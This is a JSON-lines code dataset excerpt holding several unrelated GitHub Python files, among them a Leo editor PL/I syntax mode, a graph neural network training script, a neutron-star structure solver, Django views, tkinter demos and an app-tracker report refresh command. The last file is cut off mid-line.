pl1_rule5(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"+\")\r\n\r\ndef pl1_rule6(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"-\")\r\n\r\ndef pl1_rule7(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"*\")\r\n\r\ndef pl1_rule8(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"/\")\r\n\r\ndef pl1_rule9(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\">\")\r\n\r\ndef pl1_rule10(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"<\")\r\n\r\ndef pl1_rule11(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"^\")\r\n\r\ndef pl1_rule12(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"&\")\r\n\r\ndef pl1_rule13(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"|\")\r\n\r\ndef pl1_rule14(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\".\")\r\n\r\ndef pl1_rule15(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\",\")\r\n\r\ndef pl1_rule16(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\";\")\r\n\r\ndef pl1_rule17(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\")\")\r\n\r\ndef pl1_rule18(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"(\")\r\n\r\ndef pl1_rule19(colorer, s, i):\r\n return colorer.match_mark_previous(s, i, kind=\"label\", pattern=\":\",\r\n at_whitespace_end=True,\r\n exclude_match=True)\r\n\r\ndef pl1_rule20(colorer, s, i):\r\n return colorer.match_mark_previous(s, i, kind=\"function\", pattern=\"(\",\r\n exclude_match=True)\r\n\r\ndef pl1_rule21(colorer, s, i):\r\n return colorer.match_keywords(s, i)\r\n\r\n# Rules dict for pl1_main ruleset.\r\nrulesDict1 = {\r\n \"\\\"\": [pl1_rule2,],\r\n \"%\": [pl1_rule21,],\r\n \"&\": [pl1_rule12,],\r\n \"'\": [pl1_rule1,],\r\n \"(\": [pl1_rule18, pl1_rule20,],\r\n \")\": [pl1_rule17,],\r\n \"*\": [pl1_rule3, pl1_rule7,],\r\n \"+\": [pl1_rule5,],\r\n \",\": [pl1_rule15,],\r\n \"-\": [pl1_rule6,],\r\n \".\": [pl1_rule14,],\r\n \"/\": [pl1_rule0, pl1_rule8,],\r\n \"0\": [pl1_rule21,],\r\n \"1\": [pl1_rule21,],\r\n \"2\": [pl1_rule21,],\r\n \"3\": [pl1_rule21,],\r\n \"4\": [pl1_rule21,],\r\n \"5\": [pl1_rule21,],\r\n \"6\": [pl1_rule21,],\r\n \"7\": [pl1_rule21,],\r\n \"8\": [pl1_rule21,],\r\n \"9\": [pl1_rule21,],\r\n \":\": [pl1_rule19,],\r\n \";\": [pl1_rule16,],\r\n \"<\": [pl1_rule10,],\r\n \"=\": [pl1_rule4,],\r\n \">\": [pl1_rule9,],\r\n \"@\": [pl1_rule21,],\r\n \"A\": [pl1_rule21,],\r\n \"B\": [pl1_rule21,],\r\n \"C\": [pl1_rule21,],\r\n \"D\": [pl1_rule21,],\r\n \"E\": [pl1_rule21,],\r\n \"F\": [pl1_rule21,],\r\n \"G\": [pl1_rule21,],\r\n \"H\": [pl1_rule21,],\r\n \"I\": [pl1_rule21,],\r\n \"J\": [pl1_rule21,],\r\n \"K\": [pl1_rule21,],\r\n \"L\": [pl1_rule21,],\r\n \"M\": [pl1_rule21,],\r\n \"N\": [pl1_rule21,],\r\n \"O\": [pl1_rule21,],\r\n \"P\": [pl1_rule21,],\r\n \"Q\": [pl1_rule21,],\r\n \"R\": [pl1_rule21,],\r\n \"S\": [pl1_rule21,],\r\n \"T\": [pl1_rule21,],\r\n \"U\": [pl1_rule21,],\r\n \"V\": [pl1_rule21,],\r\n \"W\": [pl1_rule21,],\r\n \"X\": [pl1_rule21,],\r\n \"Y\": [pl1_rule21,],\r\n \"Z\": [pl1_rule21,],\r\n \"^\": [pl1_rule11,],\r\n \"a\": [pl1_rule21,],\r\n \"b\": [pl1_rule21,],\r\n \"c\": [pl1_rule21,],\r\n \"d\": [pl1_rule21,],\r\n \"e\": [pl1_rule21,],\r\n \"f\": [pl1_rule21,],\r\n \"g\": [pl1_rule21,],\r\n \"h\": [pl1_rule21,],\r\n \"i\": [pl1_rule21,],\r\n \"j\": [pl1_rule21,],\r\n \"k\": [pl1_rule21,],\r\n \"l\": [pl1_rule21,],\r\n \"m\": [pl1_rule21,],\r\n \"n\": [pl1_rule21,],\r\n \"o\": [pl1_rule21,],\r\n \"p\": [pl1_rule21,],\r\n \"q\": [pl1_rule21,],\r\n \"r\": [pl1_rule21,],\r\n \"s\": [pl1_rule21,],\r\n \"t\": [pl1_rule21,],\r\n \"u\": [pl1_rule21,],\r\n \"v\": [pl1_rule21,],\r\n \"w\": [pl1_rule21,],\r\n \"x\": [pl1_rule21,],\r\n \"y\": [pl1_rule21,],\r\n \"z\": [pl1_rule21,],\r\n \"|\": [pl1_rule13,],\r\n}\r\n\r\n# x.rulesDictDict for pl1 mode.\r\nrulesDictDict = {\r\n \"pl1_main\": rulesDict1,\r\n}\r\n\r\n# Import dict for pl1 mode.\r\nimportDict = {}\r\n","repo_name":"leo-editor/leo-editor","sub_path":"leo/modes/pl1.py","file_name":"pl1.py","file_ext":"py","file_size_in_byte":19511,"program_lang":"python","lang":"en","doc_type":"code","stars":1414,"dataset":"github-code","pt":"35"} +{"seq_id":"5870304414","text":"import os.path as osp\nimport argparse\nimport numpy as np \nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.datasets import Planetoid\n\nimport torch_geometric.transforms as T\nfrom torch_geometric.nn import GCNConv, ChebConv # noqa\nfrom torch_geometric.data import Dataset, download_url\n\nfrom utils2 import load_data_adjacency_n_greatest_clusters\n\nfrom torch_geometric.data import Data, DataLoader\nimport matplotlib.pyplot as plt\n# roi = 'BRAC4002.3c_ROI1_MRTX.'\n\n# S, features , labels , edge_index , edge_weight=load_data_adjacency_n_greatest_clusters(roi)\n\n# edge_index = torch.LongTensor(edge_index)\n\n# data_list = [Data(features,edge_index=edge_index,edge_attr=edge_weight,y=labels)]\n# data= data_list[0]\n\n\n# n = labels.shape[0]\n\n# idx_train = range((int(np.floor(0.7*n)))) \n# idx_val = range((int(np.floor(0.7*n))), (int(np.floor(0.8*n))))\n# idx_test = range((int(np.floor(0.8*n))), (int(np.floor(1*n))))\n\n# train_mask = torch.tensor([i in idx_train for i in range(n)])\n# val_mask = torch.tensor([i in idx_val for i in range(n)])\n# test_mask = torch.tensor([i in idx_test for i in range(n)])\n\n# data.train_mask = train_mask\n# data.val_mask = val_mask\n# data.test_mask = test_mask\n\n# print(data_list)\n# data.num_classes= len(labels.unique())\n# print(data.num_classes)\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(data.num_features, 64, cached=True\n )\n self.conv2 = GCNConv(64, data.num_classes, cached=True\n )\n # self.conv1 = ChebConv(data.num_features, 16, K=2)\n # self.conv2 = ChebConv(16, data.num_features, K=2)\n\n def forward(self):\n x, edge_index, edge_weight = data.x, data.edge_index, data.edge_attr\n x = F.relu(self.conv1(x.float(), edge_index, edge_weight))\n x = F.dropout(x, training=self.training)\n x = self.conv2(x.float(), edge_index, edge_weight)\n return F.log_softmax(x, dim=1)\n\n\n\n\ndef train():\n model.train()\n optimizer.zero_grad()\n F.nll_loss(model()[data.train_mask], data.y[data.train_mask]).backward()\n optimizer.step()\n\n\n@torch.no_grad()\ndef test():\n model.eval()\n logits, accs = model(), []\n for _, mask in data('train_mask', 'val_mask', 'test_mask'):\n pred = logits[mask].max(1)[1]\n acc = pred.eq(data.y[mask]).sum().item() / mask.sum().item()\n accs.append(acc)\n return accs\n\n\nrois = ['BRAC3495.3f_ROI1_Cont_crop1.', 'BRAC3495.3f_ROI1_Cont_crop2.',\n 'BRAC3326.4e_ROI1_Cont_crop1.', 'BRAC3438.6f_ROI1_Cont.', 'BRAC3438.6f_ROI2_Cont.', 'BRAC3438.6f_ROI3_Cont.', 'BRAC3529.2d_ROI1_MRTX.', 'BRAC4002.3c_ROI2_MRTX_crop1.', 'BRAC4002.3c_ROI2_MRTX_crop2.', 'BRAC4002.3c_ROI3_MRTX.', 'BRAC3529.2b_ROI1_MRTX_crop2.', 'BRAC4002.3c_ROI1_MRTX.'][:6]\n\nfor roi in rois:\n print(f\"ROI: {roi}\")\n S, features , labels , edge_index , edge_weight=load_data_adjacency_n_greatest_clusters(roi,n_clusters=15)\n edge_index = torch.LongTensor(edge_index)\n\n data_list = [Data(features,edge_index=edge_index,edge_attr=edge_weight,y=labels)]\n data= data_list[0]\n n = labels.shape[0]\n\n idx_train = range((int(np.floor(0.7*n)))) \n idx_val = range((int(np.floor(0.7*n))), (int(np.floor(0.8*n))))\n idx_test = range((int(np.floor(0.8*n))), (int(np.floor(1*n))))\n\n train_mask = torch.tensor([i in idx_train for i in range(n)])\n val_mask = torch.tensor([i in idx_val for i in range(n)])\n test_mask = torch.tensor([i in idx_test for i in range(n)])\n\n data.train_mask = train_mask\n data.val_mask = val_mask\n data.test_mask = test_mask\n\n # print(data_list)\n data.num_classes= len(labels.unique())\n # print(data.num_classes)\n\n values = []\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model, data = Net().to(device), data.to(device)\n # print(data.edge_index)\n\n # print(data.edge_index.shape)\n # print(type(data.edge_index[0][0]))\n\n\n optimizer = torch.optim.Adam([\n dict(params=model.conv1.parameters(), weight_decay=5e-4),\n dict(params=model.conv2.parameters(), weight_decay=0)\n ], lr=0.01) # Only perform weight-decay on first convolution.\n\n\n best_val_acc = test_acc = 0\n for epoch in range(1, 100):\n train()\n train_acc, val_acc, tmp_test_acc = test()\n values.append(train_acc)\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n test_acc = tmp_test_acc\n log = 'Epoch: {:03d}, Train: {:.4f}, Val: {:.4f}, Test: {:.4f}'\n print(log.format(epoch, train_acc, best_val_acc, test_acc))\n\n\n\n plt.plot(values)\n plt.xlabel('Epochs')\n plt.ylabel(\"Accuracy\")\n plt.title(f\"ROI: {roi}\")\n plt.savefig(f'stolen/15 largest clusters - ROI: {roi}, (ELU,Sigmoid,ELU,SM), Test Accuracy: {test_acc}.png')\n plt.clf()","repo_name":"mkonchwalla/geogcn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41298397837","text":"\"\"\"\nЗадача 7. Отрезок\nЧто нужно сделать\n\nНапишите программу, которая считывает с клавиатуры два числа a и b, считает и выводит на консоль среднее\nарифметическое всех чисел из отрезка [a; b], кратных числу 3.\n\"\"\"\n\nnum1 = int(input('Введите первое число: '))\nnum2 = int(input('Введите второе число: '))\nsumm_numbers, count = 0, 0\nfor number in range(num1, num2 + 1):\n if number % 3 == 0:\n summ_numbers += number\n count += 1\nprint('Среднее арифметическое число: ', summ_numbers / count)\n","repo_name":"ZinovkinIgor/-Skillbox","sub_path":"Модуль 7/Домашнее задание/task 7.py","file_name":"task 7.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27922475150","text":"from tkinter import *\nimport sqlite3\n\nroot = Tk()\nroot.title(\"Doidera\")\nroot.geometry(\"400x400+200+200\")\n\n# Criar o banco de dados ou conectar a um\nconexao = sqlite3.connect(\"Aula019...Banco.db\")\n\n# Criar cursor\ncursor = conexao.cursor()\n\n# Criar tabela\ncursor.execute(\"\"\"CREATE TABLE enderecos (\nprimeiro_nome text,\nsobrenome text,\nendereco text,\ncidade text,\nestado text,\ncep integer)\"\"\")\n\n# Commitar mudanças\nconexao.commit()\n\n# Fechar conexão\nconexao.close()\n\nroot.mainloop()\n","repo_name":"DavidBitner/Aprendizado-Python","sub_path":"Curso/ModuloTkinter/Aula019Databases.py","file_name":"Aula019Databases.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15461959402","text":"from Physical_Const import *\nfrom RK4 import RK4step\nfrom adaptive_step import *\nfrom scipy import integrate, interpolate\n\ndef static(rho0,m0,r0,dr0,nu0,rhoarray,Parray,name,cutoff=0.0):\n \"\"\"Builds a neutron star model from the initial values y0 and an interpolated EOS. The solver will start\n in r0 with an arbitrary stepsize dr0 and will stop when the pressure becomes negative.\n Returns the mass, pressure, density and nu profiles as functions of r. The parameter cutoff\n can be provided to stop the integration at the minimum energy density available in the EOS.\"\"\"\n \n def PEoS(rho):\n logP=interpolate.interp1d(np.log10(rhoarray/rhodim),np.log10((Parray*c**2)/Pdim))\n return 10.0**logP(np.log10(rho))\n def rhoEoS(P):\n logrho=interpolate.interp1d(np.log10((Parray*c**2)/Pdim),np.log10((rhoarray/rhodim)))\n return 10.0**logrho(np.log10(P))\n\n \n def TOV(r,y):\n mns, pns, nuns= y\n dmdr=4.0*np.pi*r**2.0*rhoEoS(pns)\n if (1.0-(rhoEoS(pns)/rhoEoS(y0[1])))<(10*epsilon):\n dpdr=-4*np.pi*((pns+rhoEoS(y0[1]))*(rhoEoS(y0[1])/3+pns)/(1-(8*np.pi/3)*r**2*rhoEoS(y0[1])))*r\n #print('h')\n else:\n dpdr=-((4.0*np.pi*r**3.0*pns+mns)*(pns+rhoEoS(pns)))/(r*(r-2.0*mns))\n dnudr=-dpdr/(pns+rhoEoS(pns))\n #print('P',pns*Pdim,'rho',rhoEoS(pns)*rhodim)\n #print('r',r)\n return [dmdr,dpdr,dnudr]\n \n f=open('results/' + name + '/' +str(np.log10(rho0*rhodim))+'.dat','w+')\n #ms=[]; ps=[]; rhos=[]; nus=[]; rs=[] # creating lists to save the solution\n lambdaa=0.0\n f.write(str(m0)+'\\t'+ str(PEoS(rho0))+'\\t'+str(rho0)+'\\t'+str(nu0)+'\\t'+str(lambdaa)+'\\t'+str(r0)+'\\n')\n #ms.append(m0); ps.append(PEoS(rho0)); rhos.append(rho0); nus.append(nu0); rs.append(r0) \n y0=[m0,PEoS(rho0),nu0]\n y=RK4step(TOV,r0,y0,dr0) # first step taken arbitrary (dr0) \n dr=dr0\n r=r0+dr\n lambdaa = 0.5*np.log(1/(1-2*y[0]/r))\n f.write(str(y[0])+'\\t'+ str(y[1])+'\\t'+str(rhoEoS(y[1]))+'\\t'+str(y[2])+'\\t'+str(lambdaa)+'\\t'+str(r)+'\\n')\n #ms.append(y[0]); ps.append(y[1]); rhos.append(rhoEoS(y[1])); nus.append(y[2]); rs.append(r) \n while y[1] > 0.0 and rhoEoS(y[1])*rhodim > cutoff and dr>10*epsilon:\n #print('h2')\n #print('P',y[1],'m',y[0],'r',r,'dr',dr)\n dr=stepsize(y,TOV(r,y))\n y=RK4step(TOV,r,y,dr)\n r=r+dr\n lambdaa = 0.5*np.log(1/(1-2*y[0]/r))\n f.write(str(y[0])+'\\t'+ str(y[1])+'\\t'+str(rhoEoS(y[1]))+'\\t'+str(y[2])+'\\t'+str(lambdaa)+'\\t'+str(r)+'\\n')\n #ms.append(y[0]); ps.append(y[1]); rhos.append(rhoEoS(y[1])); nus.append(y[2]); rs.append(r)\n f.close()\n return np.array([y[0],r])\n\ndef MRrhoc(rhosc,m0,r0,dr0,rhoarray,Parray,name,cutoff=0.0):\n \"\"\"Builds a family of neutron star models from an equation of state P(rho) and rho(P), given a range of central densities rhosc.\n Returns three lists with the values of Rstar (RR) and Mstar (MM) for the corresponding value of rhoc (rhorho).\"\"\"\n #psc=PEoS(rhosc/rhodim) #Range of central pressures\n #MM=[];RR=[];rhorho=[]\n f=open('results/'+name+'/'+'MRrhoc'+'.dat','w+')\n for rhoc in rhosc/rhodim:\n A = static(rhoc,m0,r0,dr0,0.0,rhoarray,Parray,name,cutoff)\n f.write(str(A[1]*rdim*1e-5)+'\\t'+str(A[0]*mdim/Msun)+'\\t'+str(rhoc*rhodim)+'\\n')\n #RR.append(r[-1]*rdim*1e-5); MM.append(m[-1]*mdim/Msun); rhorho.append(rho[0]*rhodim)\n f.close()\n return None#[RR,MM,rhorho]\n","repo_name":"DavidRamosSal/stellar_structure","sub_path":"static_structure.py","file_name":"static_structure.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"74671987299","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Movie\n# Create your views here.\n\n# def home(request):\n# return HttpResponse('

    this is home

    ')\n\ndef about(request):\n return HttpResponse('

    this is about

    ')\n\ndef home(request):\n \n searchTerm = request.GET.get('searchMovie')\n if searchTerm:\n movies = Movie.objects.filter(title__icontains=searchTerm)\n else:\n movies = Movie.objects.all\n return render(request=request, \n template_name = 'home.html', \n context={'searchTerm':searchTerm, 'movies':movies})\n\ndef signup(request):\n email = request.GET.get('email')\n return render(request=request, \n template_name = 'email.html', \n context={'email':email})\n","repo_name":"Volchenkov90/django___movie","sub_path":"movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26344464690","text":"from tkinter import *\nimport pyrebase\n\ndef profil_szerkesztes(jelszo, bio, hely):\n with open(\"adatok.txt\", \"r\", encoding=\"UTF-8\") as fajl:\n nev = fajl.readline().strip()\n print(jelszo, bio, hely, nev)\n def mentes():\n\n \n config = {\n \"apiKey\": \"AIzaSyCsLNLdZWJ5RtPeXSdOraiE83g87HOAW_w\",\n \"authDomain\": \"authfortkinter.firebaseapp.com\",\n \"projectId\": \"authfortkinter\",\n \"databaseURL\": \"https://authfortkinter-default-rtdb.europe-west1.firebasedatabase.app/\",\n \"storageBucket\": \"authfortkinter.appspot.com\",\n \"messagingSenderId\": \"132997432044\",\n \"appId\": \"1:132997432044:web:b3f5e167ae61b0f5c0dbc9\"\n }\n\n firebase = pyrebase.initialize_app(config)\n database = firebase.database()\n\n\n mentendo = bemutatkoz_ki.get()\n mentendo_nev = jelszo_ki.get()\n jelszo_ki.delete(0, END)\n jelszo_ki.insert(0, mentendo_nev)\n bemutatkoz_ki.delete(0, END)\n bemutatkoz_ki.insert(0, mentendo)\n\n jelszo_eloszor = jelszo_ki.get()\n jelszo_masodszor = jelszo_ki2.get()\n\n if jelszo_eloszor != jelszo_masodszor:\n hiba = \"A két jelszó nem egyezik!\"\n else:\n if len(jelszo_eloszor) < 8:\n try:\n hiba.destroy()\n except:\n hiba = Label(ablak, fg=\"RED\", text=\"Sajnos nem elég hosszú jelszó!\").grid(row=5, column=1, columnspan=3)\n elif not any(char.isdigit() for char in jelszo_eloszor) or not any(char.isalpha() for char in jelszo_eloszor) or not any(char.isupper() for char in jelszo_eloszor) \\\n or jelszo_eloszor.isspace():\n try:\n hiba.destroy()\n except:\n hiba = Label(ablak, fg=\"RED\", text=\"Nem elég erÅ‘s jelszó!\").grid(row=5, column=1, columnspan=3)\n else: #ekkor végre mindent jól csinált a felhasználó\n database.child('Users').child(nev).set(jelszo_eloszor)\n jelszo_ki.delete(0, END)\n jelszo_ki2.delete(0, END)\n sikeres = Label(ablak, fg=\"GREEN\", text=\"Sikeres jelszóváltoztatás!\").grid(row=5, column=1, columnspan=3)\n\n\n ablak = Toplevel()\n ablak.title(\"Profilbeállítás\")\n ablak.geometry(\"500x400\")\n\n jelszo = Label(ablak, text=\"Új jelszó\")\n jelszo2 = Label(ablak, text=\"Új jelszó újra\")\n jelszo_ki = Entry(ablak, show=\"*\")\n jelszo_ki2 = Entry(ablak, show=\"*\")\n bemutatkoz = Label(ablak, text=\"Bemutatkozás\")\n\n\n bemutatkoz_ki = Entry(ablak, text=\"\")\n bemutatkoz_ki.insert(0, bio)\n\n szerk = Button(ablak, text=\"Alkalmazás 🖊\", command=mentes)\n ranglista = Label(ablak, text=\"Jelenlegi ranglista helyezés:\")\n ranglista_ki = Label(ablak, text=hely+1)\n\n jelszo.grid(row=1, column=1)\n jelszo2.grid(row=2, column=1)\n jelszo_ki.grid(row=1, column=2)\n jelszo_ki2.grid(row=2, column=2)\n bemutatkoz.grid(row=3, column=1)\n bemutatkoz_ki.grid(row=3, column=2)\n szerk.grid(row=2, column=3)\n ranglista.grid(row=4, column=1)\n ranglista_ki.grid(row=4, column=2)","repo_name":"Martinanevem/tkinter","sub_path":"root/profil.py","file_name":"profil.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16553539846","text":"import os\n\n\n_PREFIX = 'TWCOL_'\n\n\ndef current_env():\n return os.environ.get(_PREFIX + 'ENV', 'dev')\n\n\ndef env(var):\n suffix = {\n 'dev': '_DEV',\n 'stage': '_STAGE',\n 'prod': '_PROD'\n }.get(current_env(), '_DEV')\n\n varname = _PREFIX + var + suffix\n\n if varname not in os.environ:\n raise ValueError(f\"Variable {varname} not found in environment variables\")\n\n return os.environ[varname]\n","repo_name":"zahrevsky/twitter-collector","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42261087092","text":"from tkinter import *\r\n\r\ndef click():\r\n name = textbox1.get()\r\n message = str(\"Hello \"+name)\r\n textbox2[\"bg\"] = \"yellow\"\r\n textbox2[\"fg\"] = \"blue\"\r\n textbox2[\"text\"] = message\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"500x200\")\r\n\r\nlabel1 = Label(text = \"Enter your name:\")\r\nlabel1.place(x = 30, y = 20)\r\n\r\ntextbox1 = Entry(text = \"\")\r\ntextbox1.place(x = 150, y = 20, width=200, height=25)\r\ntextbox1[\"justify\"]=\"center\"\r\ntextbox1.focus()\r\n\r\nbutton1 = Button(text = \"Press me\", command = click)\r\nbutton1.place(x = 30, y = 50, width=120, height=25)\r\n\r\ntextbox2 = Message(text = \"\")\r\ntextbox2.place(x = 150, y = 50, width=200, height=25)\r\ntextbox2[\"bg\"] = \"white\"\r\ntextbox2[\"fg\"] = \"black\"\r\n\r\nwindow.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Written by Nichola Lacey and copyright owned by (c) Nichola Wilkin Ltd. 2017\r\n","repo_name":"RachelMurt/Python","sub_path":"Name to empty field.py","file_name":"Name to empty field.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31964896771","text":"from battery import Battery\r\nfrom ..utility import RoundHalfUpToInt, ConvertFromTimeBlockToHours\r\n\r\nclass NissanLeafBattery(Battery):\r\n kWhPkm = 4.5 #khw/km\r\n \r\n def __init__(self, capacity):\r\n \"\"\" Models the battery of a Nissan Leaf\r\n \"\"\"\r\n super(NissanLeafBattery, self).__init__(capacity)\r\n\r\n def Discharge(self, time, distance):\r\n \"\"\" Calculates the discharge rate of the battery. \r\n \r\n Keyword arguments:\r\n\r\n time -- The duration of the discharge. \r\n \"\"\"\r\n \r\n if type(time) != int:\r\n raise Exception(\"Time must be represented as an integer value!\")\r\n\r\n batteryConsumed = distance / self.kWhPkm\r\n return -batteryConsumed\r\n\r\n def Charge(self, time, load):\r\n \"\"\" Calculates the Charge in a battery after chargeing for a period of time\r\n\r\n Formula:\r\n P = load power divided by 1000 = U (voltage) * I (Amperage) / 1000 = Load in KW\r\n c = power generated in kw\r\n t = time (in hours)\r\n\r\n c = P * t\r\n\r\n Keyword arguments:\r\n\r\n time -- The duration of charging.\r\n load -- The load the charger outputs to the battery. \r\n \"\"\"\r\n\r\n if type(time) != int:\r\n raise Exception(\"Time must be represented as an integer value!\")\r\n\r\n P = load\r\n t = ConvertFromTimeBlockToHours(time)\r\n c = RoundHalfUpToInt(t * P)\r\n return c","repo_name":"ksanman/EvPlannerValueIteration","sub_path":"trip_scheduler/battery/nissan_leaf_battery.py","file_name":"nissan_leaf_battery.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2148554879","text":"from django.shortcuts import render\nfrom django.views.generic import DetailView, ListView, CreateView\nfrom . import models\n\n\nclass PageviewMixin():\n '''\n Calls obj.increment_pageview() and obj.save()\n '''\n def get_object(self):\n obj = super().get_object\n obj.increment_pageview()\n obj.save()\n return obj\n\nclass ReviewDetailView(PageviewMixin, DetailView):\n model = models.Review\n context_object_name = 'review'\n template_name = 'reviews/review_detail.html'\n\n\nclass ReviewListView(ListView):\n model = models.Review\n context_object_name = 'review_list'\n template_name = 'reviews/review_list.html'\n queryset = (models.Review.objects.all()\n .exclude(active=False)\n .order_by('-created'))\n\nclass IssueDetailView(PageviewMixin, DetailView):\n model = models.Issue\n context_object_name = 'issue'\n template_name = 'issues/issue_detail.html'\n\n\nclass IssueListView(ListView):\n model = models.Issue\n context_object_name = 'issue_list'\n template_name = 'issues/issue_list.html'\n queryset = (models.Issue.objects.all()\n .exclude(active=False)\n .order_by('-created'))\n\n\nclass TagListView(ListView):\n model = models.Tag\n context_object_name = 'tag_list'\n template_name = 'tags/tag_list.html'\n queryset = (models.Tag.objects.all()\n .exclude(active=False)\n .order_by('text'))\n\n\nclass TagDetailView(DetailView):\n model = models.Tag\n context_object_name = 'tag'\n template_name = 'tags/tag_detail.html'\n","repo_name":"uppertoe/journal_watch","sub_path":"reviews/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17219274501","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom exodus.core.static_analysis import *\nfrom reports.models import *\nimport shutil, os\nimport tempfile\nfrom minio import Minio\nfrom minio.error import (ResponseError)\n\n\nclass Command(BaseCommand):\n help = 'Refresh all reports'\n\n def add_arguments(self, parser):\n parser.add_argument('report_id', nargs='*', type=int)\n\n parser.add_argument(\n '--all',\n action='store_true',\n dest='all',\n help='Update all reports',\n )\n\n def handle(self, *args, **options):\n if options['all']:\n try:\n reports = Report.objects.order_by('-creation_date')\n except Report.DoesNotExist:\n raise CommandError('No reports found')\n else:\n try:\n reports = Report.objects.filter(pk__in=options['report_id'])\n except Report.DoesNotExist:\n raise CommandError('No reports found')\n\n for report in reports:\n self.stdout.write(\n self.style.SUCCESS('Start updating report \"%s\"' % report.id))\n with tempfile.TemporaryDirectory() as tmpdir:\n decoded_dir = os.path.join(tmpdir, 'decoded')\n icon_name = '%s_%s.png' % (report.bucket, report.application.handle)\n apk_name = report.apk_file\n apk_tmp = os.path.join(tmpdir, apk_name)\n\n # Download APK from storage\n minio_client = Minio(settings.MINIO_URL,\n access_key=settings.MINIO_ACCESS_KEY,\n secret_key=settings.MINIO_SECRET_KEY,\n secure=settings.MINIO_SECURE)\n try:\n data = minio_client.get_object(settings.MINIO_BUCKET, apk_name)\n with open(apk_tmp, 'wb') as file_data:\n for d in data.stream(32 * 1024):\n file_data.write(d)\n except ResponseError as err:\n print(err)\n # Decode APK\n if decodeAPK(apk_tmp, decoded_dir):\n # Refresh trackers\n trackers = findTrackers(decoded_dir)\n # if len(trackers) > len(report.found_trackers.all()):\n print(trackers)\n report.found_trackers = trackers\n report.save()\n self.stdout.write(self.style.SUCCESS('Successfully update trackers list of \"%s\"' % report.application.handle))\n # Refresh icon\n icon_path = getIcon(icon_name, report.application.handle)\n if icon_path != '':\n report.application.icon_path = icon_path\n report.application.save()\n self.stdout.write(self.style.SUCCESS('Successfully update icon of \"%s\"' % report.application.handle))\n\n\n","repo_name":"stonfute/exodus","sub_path":"exodus/reports/management/commands/refreshstaticanalysis.py","file_name":"refreshstaticanalysis.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"6083715444","text":"print('~' * 30)\r\nprint(\"Painting The Room\".center(30))\r\nprint('~' * 30)\r\n\r\n\r\ndef is_number_l(leng):\r\n try:\r\n float(leng)\r\n return leng\r\n except ValueError:\r\n return False\r\n\r\n\r\ndef is_number_w(wid):\r\n try:\r\n float(wid)\r\n return wid\r\n except ValueError:\r\n return False\r\n\r\n\r\nwhile True:\r\n length = input(\"Wall's length in meters: \")\r\n if is_number_l(length):\r\n break\r\nwhile True:\r\n width = input(\"wall's width in meters: \")\r\n if is_number_w(width):\r\n break\r\n\r\nlength = float(length)\r\nwidth = float(width)\r\nmeasure = length * width\r\npaint = 9\r\nbucket = 1\r\n\r\nwhile paint < measure:\r\n paint += 9\r\n bucket += 1\r\n\r\nprint(f'You have {measure:.2f} meters of wall \\n'\r\n f'and will need purchase {bucket} can of 